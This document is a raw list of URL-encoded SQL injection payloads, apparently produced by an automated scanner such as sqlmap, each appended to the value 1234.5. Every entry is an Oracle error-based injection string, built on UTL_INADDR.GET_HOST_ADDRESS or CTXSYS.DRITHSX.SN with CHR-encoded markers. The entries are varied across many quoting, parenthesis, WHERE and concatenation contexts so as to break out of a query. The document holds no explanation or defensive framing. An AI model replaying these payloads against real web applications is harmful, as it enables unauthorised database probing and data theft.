1234.5%27%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 1234.5%27%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 1234.5%22%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 1234.5%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%281923%3D1923 1234.5%29%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%288188%3D8188 1234.5%29%29%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%287682%3D7682 1234.5%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 1234.5%27%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%27iYDO%27%3D%27iYDO 1234.5%27%29%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27DaVs%27%3D%27DaVs 1234.5%27%29%29%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27vWIP%27%3D%27vWIP 1234.5%27%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%27KfUK%27%3D%27KfUK 1234.5%27%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%27Meqg%27%20LIKE%20%27Meqg 1234.5%27%29%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27XdLf%27%20LIKE%20%27XdLf 1234.5%27%29%29%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27uwui%27%20LIKE%20%27uwui 1234.5%27%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%27mbyY%27%20LIKE%20%27mbyY 1234.5%22%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%22JctA%22%3D%22JctA 1234.5%22%29%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22KLOc%22%3D%22KLOc 1234.5%22%29%29%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22hHZt%22%3D%22hHZt 1234.5%22%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%22UOda%22%3D%22UOda 1234.5%22%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%22tlFP%22%20LIKE%20%22tlFP 1234.5%22%29%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22bRYM%22%20LIKE%20%22bRYM 1234.5%22%29%29%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22hNQW%22%20LIKE%20%22hNQW 1234.5%22%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%22fHrq%22%20LIKE%20%22fHrq 1234.5%29%20WHERE%208764%3D8764%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 1234.5%27%29%20WHERE%203688%3D3688%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 1234.5%27%20WHERE%202477%3D2477%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 1234.5%22%20WHERE%203918%3D3918%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 1234.5%27%20%7C%7C%20%28SELECT%205827%20FROM%20DUAL%20WHERE%201504%3D1504%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207976%20WHERE%207695%3D7695%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%205580%20FROM%20DUAL%20WHERE%201921%3D1921%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20%29 1234.5%20%2B%20%28SELECT%205329%20WHERE%205998%3D5998%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27RbWM%27%20FROM%20DUAL%20WHERE%202401%3D2401%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27mzOo%27%20WHERE%201840%3D1840%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20%23 1234.5%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 1234.5%27%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 1234.5%27%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 1234.5%22%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 1234.5%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%282659%3D2659 1234.5%29%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%288704%3D8704 1234.5%29%29%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%286638%3D6638 1234.5%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 1234.5%27%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27LnvA%27%3D%27LnvA 1234.5%27%29%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27GGGM%27%3D%27GGGM 1234.5%27%29%29%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27liqg%27%3D%27liqg 1234.5%27%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%27DEBO%27%3D%27DEBO 1234.5%27%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27NbhN%27%20LIKE%20%27NbhN 1234.5%27%29%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27WAHX%27%20LIKE%20%27WAHX 1234.5%27%29%29%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27YsBp%27%20LIKE%20%27YsBp 1234.5%27%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%27mXEV%27%20LIKE%20%27mXEV 1234.5%22%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22AdOM%22%3D%22AdOM 1234.5%22%29%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22BSFT%22%3D%22BSFT 1234.5%22%29%29%29%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22mVSR%22%3D%22mVSR 1234.5%22%20AND%205114%3DCTXSYS.DRITHSX.SN%285114%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285114%3D5114%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%22nvmB%22%3D%22nvmB 